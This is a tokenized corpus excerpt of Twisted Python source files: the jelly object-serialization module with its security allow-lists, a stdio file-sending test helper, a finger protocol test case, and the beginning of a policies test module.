"<STR_LIT>" , append = True ) <EOL> import sets as _sets <EOL> finally : <EOL> warnings . filters . pop ( ) <EOL> from zope . interface import implements <EOL> from twisted . python . reflect import namedObject , qual <EOL> from twisted . persisted . crefutil import NotKnown , _Tuple , _InstanceMethod <EOL> from twisted . persisted . crefutil import _DictKeyAndValue , _Dereference <EOL> from twisted . persisted . crefutil import _Container <EOL> from twisted . python . compat import reduce <EOL> from twisted . spread . interfaces import IJellyable , IUnjellyable <EOL> DictTypes = ( DictionaryType , ) <EOL> None_atom = "<STR_LIT:None>" <EOL> class_atom = "<STR_LIT:class>" <EOL> module_atom = "<STR_LIT>" <EOL> function_atom = "<STR_LIT>" <EOL> dereference_atom = '<STR_LIT>' <EOL> persistent_atom = '<STR_LIT>' <EOL> reference_atom = '<STR_LIT>' <EOL> dictionary_atom = "<STR_LIT>" <EOL> list_atom = '<STR_LIT:list>' <EOL> set_atom = '<STR_LIT>' <EOL> tuple_atom = "<STR_LIT>" <EOL> instance_atom = '<STR_LIT>' <EOL> frozenset_atom = '<STR_LIT>' <EOL> unpersistable_atom = "<STR_LIT>" <EOL> unjellyableRegistry = { } <EOL> unjellyableFactoryRegistry = { } <EOL> _NO_STATE = object ( ) <EOL> def _newInstance ( cls , state = _NO_STATE ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( cls , types . ClassType ) : <EOL> inst = cls . __new__ ( cls ) <EOL> if state is not _NO_STATE : <EOL> inst . __dict__ . update ( state ) <EOL> else : <EOL> if state is not _NO_STATE : <EOL> inst = InstanceType ( cls , state ) <EOL> else : <EOL> inst = InstanceType ( cls ) <EOL> return inst <EOL> def _maybeClass ( classnamep ) : <EOL> try : <EOL> object <EOL> except NameError : <EOL> isObject = <NUM_LIT:0> <EOL> else : <EOL> isObject = isinstance ( classnamep , type ) <EOL> if isinstance ( classnamep , ClassType ) or isObject : <EOL> return qual ( classnamep ) <EOL> return classnamep <EOL> def setUnjellyableForClass ( classname , unjellyable ) : <EOL> """<STR_LIT>""" <EOL> global unjellyableRegistry <EOL> classname = _maybeClass ( classname ) <EOL> unjellyableRegistry [ classname ] = unjellyable <EOL> globalSecurity . allowTypes ( classname ) <EOL> def setUnjellyableFactoryForClass ( classname , copyFactory ) : <EOL> """<STR_LIT>""" <EOL> global unjellyableFactoryRegistry <EOL> classname = _maybeClass ( classname ) <EOL> unjellyableFactoryRegistry [ classname ] = copyFactory <EOL> globalSecurity . allowTypes ( classname ) <EOL> def setUnjellyableForClassTree ( module , baseClass , prefix = None ) : <EOL> """<STR_LIT>""" <EOL> if prefix is None : <EOL> prefix = module . __name__ <EOL> if prefix : <EOL> prefix = "<STR_LIT>" % prefix <EOL> for i in dir ( module ) : <EOL> i_ = getattr ( module , i ) <EOL> if type ( i_ ) == types . ClassType : <EOL> if issubclass ( i_ , baseClass ) : <EOL> setUnjellyableForClass ( '<STR_LIT>' % ( prefix , i ) , i_ ) <EOL> def getInstanceState ( inst , jellier ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( inst , "<STR_LIT>" ) : <EOL> state = inst . __getstate__ ( ) <EOL> else : <EOL> state = inst . __dict__ <EOL> sxp = jellier . prepare ( inst ) <EOL> sxp . extend ( [ qual ( inst . __class__ ) , jellier . jelly ( state ) ] ) <EOL> return jellier . preserve ( inst , sxp ) <EOL> def setInstanceState ( inst , unjellier , jellyList ) : <EOL> """<STR_LIT>""" <EOL> state = unjellier . unjelly ( jellyList [ <NUM_LIT:1> ] ) <EOL> if hasattr ( inst , "<STR_LIT>" ) : <EOL> inst . __setstate__ ( state ) <EOL> else : <EOL> inst . __dict__ = state <EOL> return inst <EOL> class Unpersistable : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , reason ) : <EOL> """<STR_LIT>""" <EOL> self . reason = reason <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % repr ( self . reason ) <EOL> class Jellyable : <EOL> """<STR_LIT>""" <EOL> implements ( IJellyable ) <EOL> def getStateFor ( self , jellier ) : <EOL> return self . __dict__ <EOL> def jellyFor ( self , jellier ) : <EOL> """<STR_LIT>""" <EOL> sxp = jellier . prepare ( self ) <EOL> sxp . extend ( [ <EOL> qual ( self . __class__ ) , <EOL> jellier . jelly ( self . getStateFor ( jellier ) ) ] ) <EOL> return jellier . preserve ( self , sxp ) <EOL> class Unjellyable : <EOL> """<STR_LIT>""" <EOL> implements ( IUnjellyable ) <EOL> def setStateFor ( self , unjellier , state ) : <EOL> self . __dict__ = state <EOL> def unjellyFor ( self , unjellier , jellyList ) : <EOL> """<STR_LIT>""" <EOL> state = unjellier . unjelly ( jellyList [ <NUM_LIT:1> ] ) <EOL> self . setStateFor ( unjellier , state ) <EOL> return self <EOL> class _Jellier : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , taster , persistentStore , invoker ) : <EOL> """<STR_LIT>""" <EOL> self . taster = taster <EOL> self . preserved = { } <EOL> self . cooked = { } <EOL> self . cooker = { } <EOL> self . _ref_id = <NUM_LIT:1> <EOL> self . persistentStore = persistentStore <EOL> self . invoker = invoker <EOL> def _cook ( self , object ) : <EOL> """<STR_LIT>""" <EOL> aList = self . preserved [ id ( object ) ] <EOL> newList = copy . copy ( aList ) <EOL> refid = self . _ref_id <EOL> self . _ref_id = self . _ref_id + <NUM_LIT:1> <EOL> aList [ : ] = [ reference_atom , refid , newList ] <EOL> self . cooked [ id ( object ) ] = [ dereference_atom , refid ] <EOL> return aList <EOL> def prepare ( self , object ) : <EOL> """<STR_LIT>""" <EOL> self . preserved [ id ( object ) ] = [ ] <EOL> self . cooker [ id ( object ) ] = object <EOL> return [ ] <EOL> def preserve ( self , object , sexp ) : <EOL> """<STR_LIT>""" <EOL> if id ( object ) in self . cooked : <EOL> self . preserved [ id ( object ) ] [ <NUM_LIT:2> ] = sexp <EOL> sexp = self . preserved [ id ( object ) ] <EOL> else : <EOL> self . preserved [ id ( object ) ] = sexp <EOL> return sexp <EOL> constantTypes = { types . StringType : <NUM_LIT:1> , types . IntType : <NUM_LIT:1> , <EOL> types . FloatType : <NUM_LIT:1> , types . LongType : <NUM_LIT:1> } <EOL> def _checkMutable ( self , obj ) : <EOL> objId = id ( obj ) <EOL> if objId in self . cooked : <EOL> return self . cooked [ objId ] <EOL> if objId in self . preserved : <EOL> self . _cook ( obj ) <EOL> return self . cooked [ objId ] <EOL> def jelly ( self , obj ) : <EOL> if isinstance ( obj , Jellyable ) : <EOL> preRef = self . _checkMutable ( obj ) <EOL> if preRef : <EOL> return preRef <EOL> return obj . jellyFor ( self ) <EOL> objType = type ( obj ) <EOL> if self . taster . isTypeAllowed ( qual ( objType ) ) : <EOL> if ( ( objType is StringType ) or <EOL> ( objType is IntType ) or <EOL> ( objType is LongType ) or <EOL> ( objType is FloatType ) ) : <EOL> return obj <EOL> elif objType is MethodType : <EOL> return [ "<STR_LIT>" , <EOL> obj . im_func . __name__ , <EOL> self . jelly ( obj . im_self ) , <EOL> self . jelly ( obj . im_class ) ] <EOL> elif UnicodeType and objType is UnicodeType : <EOL> return [ '<STR_LIT>' , obj . encode ( '<STR_LIT>' ) ] <EOL> elif objType is NoneType : <EOL> return [ '<STR_LIT:None>' ] <EOL> elif objType is FunctionType : <EOL> name = obj . __name__ <EOL> return [ '<STR_LIT>' , str ( pickle . whichmodule ( obj , obj . __name__ ) ) <EOL> + '<STR_LIT:.>' + <EOL> name ] <EOL> elif objType is ModuleType : <EOL> return [ '<STR_LIT>' , obj . __name__ ] <EOL> elif objType is BooleanType : <EOL> return [ '<STR_LIT>' , obj and '<STR_LIT:true>' or '<STR_LIT:false>' ] <EOL> elif objType is datetime . datetime : <EOL> if obj . tzinfo : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" ) <EOL> return [ '<STR_LIT>' , '<STR_LIT>' % ( <EOL> obj . year , obj . month , obj . day , obj . hour , <EOL> obj . minute , obj . second , obj . microsecond ) ] <EOL> elif objType is datetime . time : <EOL> if obj . tzinfo : <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" ) <EOL> return [ '<STR_LIT:time>' , '<STR_LIT>' % ( obj . hour , obj . minute , <EOL> obj . second , obj . microsecond ) ] <EOL> elif objType is datetime . date : <EOL> return [ '<STR_LIT:date>' , '<STR_LIT>' % ( obj . year , obj . month , obj . day ) ] <EOL> elif objType is datetime . timedelta : <EOL> return [ '<STR_LIT>' , '<STR_LIT>' % ( obj . days , obj . seconds , <EOL> obj . microseconds ) ] <EOL> elif objType is ClassType or issubclass ( objType , type ) : <EOL> return [ '<STR_LIT:class>' , qual ( obj ) ] <EOL> elif decimal is not None and objType is decimal . Decimal : <EOL> return self . jelly_decimal ( obj ) <EOL> else : <EOL> preRef = self . _checkMutable ( obj ) <EOL> if preRef : <EOL> return preRef <EOL> sxp = self . prepare ( obj ) <EOL> if objType is ListType : <EOL> sxp . extend ( self . _jellyIterable ( list_atom , obj ) ) <EOL> elif objType is TupleType : <EOL> sxp . extend ( self . _jellyIterable ( tuple_atom , obj ) ) <EOL> elif objType in DictTypes : <EOL> sxp . append ( dictionary_atom ) <EOL> for key , val in obj . items ( ) : <EOL> sxp . append ( [ self . jelly ( key ) , self . jelly ( val ) ] ) <EOL> elif ( _set is not None and objType is set or <EOL> objType is _sets . Set ) : <EOL> sxp . extend ( self . _jellyIterable ( set_atom , obj ) ) <EOL> elif ( _set is not None and objType is frozenset or <EOL> objType is _sets . ImmutableSet ) : <EOL> sxp . extend ( self . _jellyIterable ( frozenset_atom , obj ) ) <EOL> else : <EOL> className = qual ( obj . __class__ ) <EOL> persistent = None <EOL> if self . persistentStore : <EOL> persistent = self . persistentStore ( obj , self ) <EOL> if persistent is not None : <EOL> sxp . append ( persistent_atom ) <EOL> sxp . append ( persistent ) <EOL> elif self . taster . isClassAllowed ( obj . __class__ ) : <EOL> sxp . append ( className ) <EOL> if hasattr ( obj , "<STR_LIT>" ) : <EOL> state = obj . __getstate__ ( ) <EOL> else : <EOL> state = obj . __dict__ <EOL> sxp . append ( self . jelly ( state ) ) <EOL> else : <EOL> self . unpersistable ( <EOL> "<STR_LIT>" % <EOL> qual ( obj . __class__ ) , sxp ) <EOL> return self . preserve ( obj , sxp ) <EOL> else : <EOL> if objType is InstanceType : <EOL> raise InsecureJelly ( "<STR_LIT>" % <EOL> ( obj . __class__ , obj ) ) <EOL> raise InsecureJelly ( "<STR_LIT>" % <EOL> ( objType , obj ) ) <EOL> def _jellyIterable ( self , atom , obj ) : <EOL> """<STR_LIT>""" <EOL> yield atom <EOL> for item in obj : <EOL> yield self . jelly ( item ) <EOL> def jelly_decimal ( self , d ) : <EOL> """<STR_LIT>""" <EOL> sign , guts , exponent = d . as_tuple ( ) <EOL> value = reduce ( lambda left , right : left * <NUM_LIT:10> + right , guts ) <EOL> if sign : <EOL> value = - value <EOL> return [ '<STR_LIT>' , value , exponent ] <EOL> def unpersistable ( self , reason , sxp = None ) : <EOL> """<STR_LIT>""" <EOL> if sxp is None : <EOL> sxp = [ ] <EOL> sxp . append ( unpersistable_atom ) <EOL> sxp . append ( reason ) <EOL> return sxp <EOL> class _Unjellier : <EOL> def __init__ ( self , taster , persistentLoad , invoker ) : <EOL> self . taster = taster <EOL> self . persistentLoad = persistentLoad <EOL> self . references = { } <EOL> self . postCallbacks = [ ] <EOL> self . invoker = invoker <EOL> def unjellyFull ( self , obj ) : <EOL> o = self . unjelly ( obj ) <EOL> for m in self . postCallbacks : <EOL> m ( ) <EOL> return o <EOL> def unjelly ( self , obj ) : <EOL> if type ( obj ) is not types . ListType : <EOL> return obj <EOL> jelType = obj [ <NUM_LIT:0> ] <EOL> if not self . taster . isTypeAllowed ( jelType ) : <EOL> raise InsecureJelly ( jelType ) <EOL> regClass = unjellyableRegistry . get ( jelType ) <EOL> if regClass is not None : <EOL> if isinstance ( regClass , ClassType ) : <EOL> inst = _Dummy ( ) <EOL> inst . __class__ = regClass <EOL> method = inst . unjellyFor <EOL> elif isinstance ( regClass , type ) : <EOL> inst = regClass . __new__ ( regClass ) <EOL> method = inst . unjellyFor <EOL> else : <EOL> method = regClass <EOL> val = method ( self , obj ) <EOL> if hasattr ( val , '<STR_LIT>' ) : <EOL> self . postCallbacks . append ( inst . postUnjelly ) <EOL> return val <EOL> regFactory = unjellyableFactoryRegistry . get ( jelType ) <EOL> if regFactory is not None : <EOL> state = self . unjelly ( obj [ <NUM_LIT:1> ] ) <EOL> inst = regFactory ( state ) <EOL> if hasattr ( inst , '<STR_LIT>' ) : <EOL> self . postCallbacks . append ( inst . postUnjelly ) <EOL> return inst <EOL> thunk = getattr ( self , '<STR_LIT>' % jelType , None ) <EOL> if thunk is not None : <EOL> ret = thunk ( obj [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> nameSplit = jelType . split ( '<STR_LIT:.>' ) <EOL> modName = '<STR_LIT:.>' . join ( nameSplit [ : - <NUM_LIT:1> ] ) <EOL> if not self . taster . isModuleAllowed ( modName ) : <EOL> raise InsecureJelly ( <EOL> "<STR_LIT>" % ( modName , jelType ) ) <EOL> clz = namedObject ( jelType ) <EOL> if not self . taster . isClassAllowed ( clz ) : <EOL> raise InsecureJelly ( "<STR_LIT>" % jelType ) <EOL> if hasattr ( clz , "<STR_LIT>" ) : <EOL> ret = _newInstance ( clz ) <EOL> state = self . unjelly ( obj [ <NUM_LIT:1> ] ) <EOL> ret . __setstate__ ( state ) <EOL> else : <EOL> state = self . unjelly ( obj [ <NUM_LIT:1> ] ) <EOL> ret = _newInstance ( clz , state ) <EOL> if hasattr ( clz , '<STR_LIT>' ) : <EOL> self . postCallbacks . append ( ret . postUnjelly ) <EOL> return ret <EOL> def _unjelly_None ( self , exp ) : <EOL> return None <EOL> def _unjelly_unicode ( self , exp ) : <EOL> if UnicodeType : <EOL> return unicode ( exp [ <NUM_LIT:0> ] , "<STR_LIT>" ) <EOL> else : <EOL> return Unpersistable ( "<STR_LIT>" % ( exp [ <NUM_LIT:0> ] , ) ) <EOL> def _unjelly_decimal ( self , exp ) : <EOL> """<STR_LIT>""" <EOL> if decimal is None : <EOL> return Unpersistable ( <EOL> "<STR_LIT>" % ( exp [ <NUM_LIT:0> ] * ( <NUM_LIT:10> ** exp [ <NUM_LIT:1> ] ) , ) ) <EOL> value = exp [ <NUM_LIT:0> ] <EOL> exponent = exp [ <NUM_LIT:1> ] <EOL> if value < <NUM_LIT:0> : <EOL> sign = <NUM_LIT:1> <EOL> else : <EOL> sign = <NUM_LIT:0> <EOL> guts = decimal . Decimal ( value ) . as_tuple ( ) [ <NUM_LIT:1> ] <EOL> return decimal . Decimal ( ( sign , guts , exponent ) ) <EOL> def _unjelly_boolean ( self , exp ) : <EOL> if BooleanType : <EOL> assert exp [ <NUM_LIT:0> ] in ( '<STR_LIT:true>' , '<STR_LIT:false>' ) <EOL> return exp [ <NUM_LIT:0> ] == '<STR_LIT:true>' <EOL> else : <EOL> return Unpersistable ( "<STR_LIT>" % ( exp [ <NUM_LIT:0> ] , ) ) <EOL> def _unjelly_datetime ( self , exp ) : <EOL> return datetime . datetime ( * map ( int , exp [ <NUM_LIT:0> ] . split ( ) ) ) <EOL> def _unjelly_date ( self , exp ) : <EOL> return datetime . date ( * map ( int , exp [ <NUM_LIT:0> ] . split ( ) ) ) <EOL> def _unjelly_time ( self , exp ) : <EOL> return datetime . time ( * map ( int , exp [ <NUM_LIT:0> ] . split ( ) ) ) <EOL> def _unjelly_timedelta ( self , exp ) : <EOL> days , seconds , microseconds = map ( int , exp [ <NUM_LIT:0> ] . split ( ) ) <EOL> return datetime . timedelta ( <EOL> days = days , seconds = seconds , microseconds = microseconds ) <EOL> def unjellyInto ( self , obj , loc , jel ) : <EOL> o = self . unjelly ( jel ) <EOL> if isinstance ( o , NotKnown ) : <EOL> o . addDependant ( obj , loc ) <EOL> obj [ loc ] = o <EOL> return o <EOL> def _unjelly_dereference ( self , lst ) : <EOL> refid = lst [ <NUM_LIT:0> ] <EOL> x = self . references . get ( refid ) <EOL> if x is not None : <EOL> return x <EOL> der = _Dereference ( refid ) <EOL> self . references [ refid ] = der <EOL> return der <EOL> def _unjelly_reference ( self , lst ) : <EOL> refid = lst [ <NUM_LIT:0> ] <EOL> exp = lst [ <NUM_LIT:1> ] <EOL> o = self . unjelly ( exp ) <EOL> ref = self . references . get ( refid ) <EOL> if ( ref is None ) : <EOL> self . references [ refid ] = o <EOL> elif isinstance ( ref , NotKnown ) : <EOL> ref . resolveDependants ( o ) <EOL> self . references [ refid ] = o <EOL> else : <EOL> assert <NUM_LIT:0> , "<STR_LIT>" <EOL> return o <EOL> def _unjelly_tuple ( self , lst ) : <EOL> l = range ( len ( lst ) ) <EOL> finished = <NUM_LIT:1> <EOL> for elem in l : <EOL> if isinstance ( self . unjellyInto ( l , elem , lst [ elem ] ) , NotKnown ) : <EOL> finished = <NUM_LIT:0> <EOL> if finished : <EOL> return tuple ( l ) <EOL> else : <EOL> return _Tuple ( l ) <EOL> def _unjelly_list ( self , lst ) : <EOL> l = range ( len ( lst ) ) <EOL> for elem in l : <EOL> self . unjellyInto ( l , elem , lst [ elem ] ) <EOL> return l <EOL> def _unjellySetOrFrozenset ( self , lst , containerType ) : <EOL> """<STR_LIT>""" <EOL> l = range ( len ( lst ) ) <EOL> finished = True <EOL> for elem in l : <EOL> data = self . unjellyInto ( l , elem , lst [ elem ] ) <EOL> if isinstance ( data , NotKnown ) : <EOL> finished = False <EOL> if not finished : <EOL> return _Container ( l , containerType ) <EOL> else : <EOL> return containerType ( l ) <EOL> def _unjelly_set ( self , lst ) : <EOL> """<STR_LIT>""" <EOL> if _set is not None : <EOL> containerType = set <EOL> else : <EOL> containerType = _sets . Set <EOL> return self . _unjellySetOrFrozenset ( lst , containerType ) <EOL> def _unjelly_frozenset ( self , lst ) : <EOL> """<STR_LIT>""" <EOL> if _set is not None : <EOL> containerType = frozenset <EOL> else : <EOL> containerType = _sets . ImmutableSet <EOL> return self . _unjellySetOrFrozenset ( lst , containerType ) <EOL> def _unjelly_dictionary ( self , lst ) : <EOL> d = { } <EOL> for k , v in lst : <EOL> kvd = _DictKeyAndValue ( d ) <EOL> self . unjellyInto ( kvd , <NUM_LIT:0> , k ) <EOL> self . unjellyInto ( kvd , <NUM_LIT:1> , v ) <EOL> return d <EOL> def _unjelly_module ( self , rest ) : <EOL> moduleName = rest [ <NUM_LIT:0> ] <EOL> if type ( moduleName ) != types . StringType : <EOL> raise InsecureJelly ( <EOL> "<STR_LIT>" ) <EOL> if not self . taster . isModuleAllowed ( moduleName ) : <EOL> raise InsecureJelly ( <EOL> "<STR_LIT>" % ( moduleName , ) ) <EOL> mod = __import__ ( moduleName , { } , { } , "<STR_LIT:x>" ) <EOL> return mod <EOL> def _unjelly_class ( self , rest ) : <EOL> clist = rest [ <NUM_LIT:0> ] . split ( '<STR_LIT:.>' ) <EOL> modName = '<STR_LIT:.>' . join ( clist [ : - <NUM_LIT:1> ] ) <EOL> if not self . taster . isModuleAllowed ( modName ) : <EOL> raise InsecureJelly ( "<STR_LIT>" % modName ) <EOL> klaus = namedObject ( rest [ <NUM_LIT:0> ] ) <EOL> objType = type ( klaus ) <EOL> if objType not in ( types . ClassType , types . TypeType ) : <EOL> raise InsecureJelly ( <EOL> "<STR_LIT>" % ( <EOL> rest [ <NUM_LIT:0> ] , klaus ) ) <EOL> if not self . taster . isClassAllowed ( klaus ) : <EOL> raise InsecureJelly ( "<STR_LIT>" % qual ( klaus ) ) <EOL> return klaus <EOL> def _unjelly_function ( self , rest ) : <EOL> modSplit = rest [ <NUM_LIT:0> ] . split ( '<STR_LIT:.>' ) <EOL> modName = '<STR_LIT:.>' . join ( modSplit [ : - <NUM_LIT:1> ] ) <EOL> if not self . taster . isModuleAllowed ( modName ) : <EOL> raise InsecureJelly ( "<STR_LIT>" % modName ) <EOL> function = namedObject ( rest [ <NUM_LIT:0> ] ) <EOL> return function <EOL> def _unjelly_persistent ( self , rest ) : <EOL> if self . persistentLoad : <EOL> pload = self . persistentLoad ( rest [ <NUM_LIT:0> ] , self ) <EOL> return pload <EOL> else : <EOL> return Unpersistable ( "<STR_LIT>" ) <EOL> def _unjelly_instance ( self , rest ) : <EOL> clz = self . unjelly ( rest [ <NUM_LIT:0> ] ) <EOL> if type ( clz ) is not types . ClassType : <EOL> raise InsecureJelly ( "<STR_LIT>" ) <EOL> if hasattr ( clz , "<STR_LIT>" ) : <EOL> inst = _newInstance ( clz , { } ) <EOL> state = self . unjelly ( rest [ <NUM_LIT:1> ] ) <EOL> inst . __setstate__ ( state ) <EOL> else : <EOL> state = self . unjelly ( rest [ <NUM_LIT:1> ] ) <EOL> inst = _newInstance ( clz , state ) <EOL> if hasattr ( clz , '<STR_LIT>' ) : <EOL> self . postCallbacks . append ( inst . postUnjelly ) <EOL> return inst <EOL> def _unjelly_unpersistable ( self , rest ) : <EOL> return Unpersistable ( "<STR_LIT>" % ( rest [ <NUM_LIT:0> ] , ) ) <EOL> def _unjelly_method ( self , rest ) : <EOL> """<STR_LIT>""" <EOL> im_name = rest [ <NUM_LIT:0> ] <EOL> im_self = self . unjelly ( rest [ <NUM_LIT:1> ] ) <EOL> im_class = self . unjelly ( rest [ <NUM_LIT:2> ] ) <EOL> if type ( im_class ) is not types . ClassType : <EOL> raise InsecureJelly ( "<STR_LIT>" ) <EOL> if im_name in im_class . __dict__ : <EOL> if im_self is None : <EOL> im = getattr ( im_class , im_name ) <EOL> elif isinstance ( im_self , NotKnown ) : <EOL> im = _InstanceMethod ( im_name , im_self , im_class ) <EOL> else : <EOL> im = MethodType ( im_class . __dict__ [ im_name ] , im_self , im_class ) <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return im <EOL> class _Dummy : <EOL> """<STR_LIT>""" <EOL> class _DummyNewStyle ( object ) : <EOL> """<STR_LIT>""" <EOL> def _newDummyLike ( instance ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( instance . __class__ , type ) : <EOL> dummy = _DummyNewStyle ( ) <EOL> else : <EOL> dummy = _Dummy ( ) <EOL> dummy . __class__ = instance . __class__ <EOL> dummy . __dict__ = instance . __dict__ <EOL> return dummy <EOL> class InsecureJelly ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class DummySecurityOptions : <EOL> """<STR_LIT>""" <EOL> def isModuleAllowed ( self , moduleName ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def isClassAllowed ( self , klass ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> def isTypeAllowed ( self , typeName ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:1> <EOL> class SecurityOptions : <EOL> """<STR_LIT>""" <EOL> basicTypes = [ "<STR_LIT>" , "<STR_LIT:list>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . allowedTypes = { "<STR_LIT:None>" : <NUM_LIT:1> , <EOL> "<STR_LIT:bool>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:string>" : <NUM_LIT:1> , <EOL> "<STR_LIT:str>" : <NUM_LIT:1> , <EOL> "<STR_LIT:int>" : <NUM_LIT:1> , <EOL> "<STR_LIT:float>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT:time>" : <NUM_LIT:1> , <EOL> "<STR_LIT:date>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:1> } <EOL> if hasattr ( types , '<STR_LIT>' ) : <EOL> self . allowedTypes [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> if decimal is not None : <EOL> self . allowedTypes [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . allowedTypes [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . allowedTypes [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> self . allowedModules = { } <EOL> self . allowedClasses = { } <EOL> def allowBasicTypes ( self ) : <EOL> """<STR_LIT>""" <EOL> self . allowTypes ( * self . basicTypes ) <EOL> def allowTypes ( self , * types ) : <EOL> """<STR_LIT>""" <EOL> for typ in types : <EOL> if not isinstance ( typ , str ) : <EOL> typ = qual ( typ ) <EOL> self . allowedTypes [ typ ] = <NUM_LIT:1> <EOL> def allowInstancesOf ( self , * classes ) : <EOL> """<STR_LIT>""" <EOL> self . allowBasicTypes ( ) <EOL> self . allowTypes ( "<STR_LIT>" , "<STR_LIT:class>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> for klass in classes : <EOL> self . allowTypes ( qual ( klass ) ) <EOL> self . allowModules ( klass . __module__ ) <EOL> self . allowedClasses [ klass ] = <NUM_LIT:1> <EOL> def allowModules ( self , * modules ) : <EOL> """<STR_LIT>""" <EOL> for module in modules : <EOL> if type ( module ) == types . ModuleType : <EOL> module = module . __name__ <EOL> self . allowedModules [ module ] = <NUM_LIT:1> <EOL> def isModuleAllowed ( self , moduleName ) : <EOL> """<STR_LIT>""" <EOL> return moduleName in self . allowedModules <EOL> def isClassAllowed ( self , klass ) : <EOL> """<STR_LIT>""" <EOL> return klass in self . allowedClasses <EOL> def isTypeAllowed ( self , typeName ) : <EOL> """<STR_LIT>""" <EOL> return ( typeName in self . allowedTypes or '<STR_LIT:.>' in typeName ) <EOL> globalSecurity = SecurityOptions ( ) <EOL> globalSecurity . allowBasicTypes ( ) <EOL> def jelly ( object , taster = DummySecurityOptions ( ) , persistentStore = None , <EOL> invoker = None ) : <EOL> """<STR_LIT>""" <EOL> return _Jellier ( taster , persistentStore , invoker ) . jelly ( object ) <EOL> def unjelly ( sexp , taster = DummySecurityOptions ( ) , persistentLoad = None , <EOL> invoker = None ) : <EOL> """<STR_LIT>""" <EOL> return _Unjellier ( taster , persistentLoad , invoker ) . unjellyFull ( sexp ) </s>
<s> """<STR_LIT>""" <EOL> import sys , _preamble <EOL> from twisted . python import log , reflect <EOL> from twisted . internet import stdio , protocol <EOL> from twisted . protocols import basic <EOL> def failed ( err ) : <EOL> log . startLogging ( sys . stderr ) <EOL> log . err ( err ) <EOL> class ConsumerChild ( protocol . Protocol ) : <EOL> def __init__ ( self , junkPath ) : <EOL> self . junkPath = junkPath <EOL> def connectionMade ( self ) : <EOL> d = basic . FileSender ( ) . beginFileTransfer ( file ( self . junkPath ) , self . transport ) <EOL> d . addErrback ( failed ) <EOL> d . addCallback ( lambda ign : self . transport . loseConnection ( ) ) <EOL> def connectionLost ( self , reason ) : <EOL> reactor . stop ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> reflect . namedAny ( sys . argv [ <NUM_LIT:1> ] ) . install ( ) <EOL> from twisted . internet import reactor <EOL> stdio . StandardIO ( ConsumerChild ( sys . argv [ <NUM_LIT:2> ] ) ) <EOL> reactor . run ( ) </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> from twisted . protocols import finger <EOL> from twisted . test . proto_helpers import StringTransport <EOL> class FingerTestCase ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . transport = StringTransport ( ) <EOL> self . protocol = finger . Finger ( ) <EOL> self . protocol . makeConnection ( self . transport ) <EOL> def test_simple ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_simpleW ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_forwarding ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_list ( self ) : <EOL> """<STR_LIT>""" <EOL> self . protocol . dataReceived ( "<STR_LIT:\r\n>" ) <EOL> self . assertEqual ( <EOL> self . transport . value ( ) , <EOL> "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from zope . interface import Interface , implements , implementedBy <EOL> from StringIO import StringIO <EOL> from twisted . trial import unittest <EOL> from twisted . test . proto_helpers import StringTransport <EOL> from twisted . test . proto_helpers import StringTransportWithDisconnection <EOL> from twisted . internet import protocol , reactor , address , defer , task <EOL> from twisted . protocols import policies <EOL> class SimpleProtocol ( protocol . Protocol ) : <EOL> connected = disconnected = <NUM_LIT:0> <EOL> buffer = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . dConnected = defer . Deferred ( ) <EOL> self . dDisconnected = defer . Deferred ( ) <EOL> def connectionMade ( self ) : <EOL> self . connected = <NUM_LIT:1> <EOL> self . dConnected . callback ( '<STR_LIT>' ) <EOL> def connectionLost ( self , reason ) : <EOL> self . disconnected = <NUM_LIT:1> <EOL> self . dDisconnected . callback ( '<STR_LIT>' ) <EOL> def dataReceived ( self , data ) : <EOL> self . buffer += data <EOL> class SillyFactory ( protocol . ClientFactory ) : <EOL> def __init__ ( self , p ) : <EOL> self . p = p <EOL> def buildProtocol ( self , addr ) : <EOL> return self . p <EOL> class EchoProtocol ( protocol . Protocol ) : <EOL> paused = False <EOL> def pauseProducing ( self ) : <EOL> self . paused = True <EOL> def resumeProducing ( self ) : <EOL> self . paused = False <EOL> def stopProducing ( self ) : <EOL> pass <EOL> def dataReceived ( self , data ) : <EOL> self . transport . write 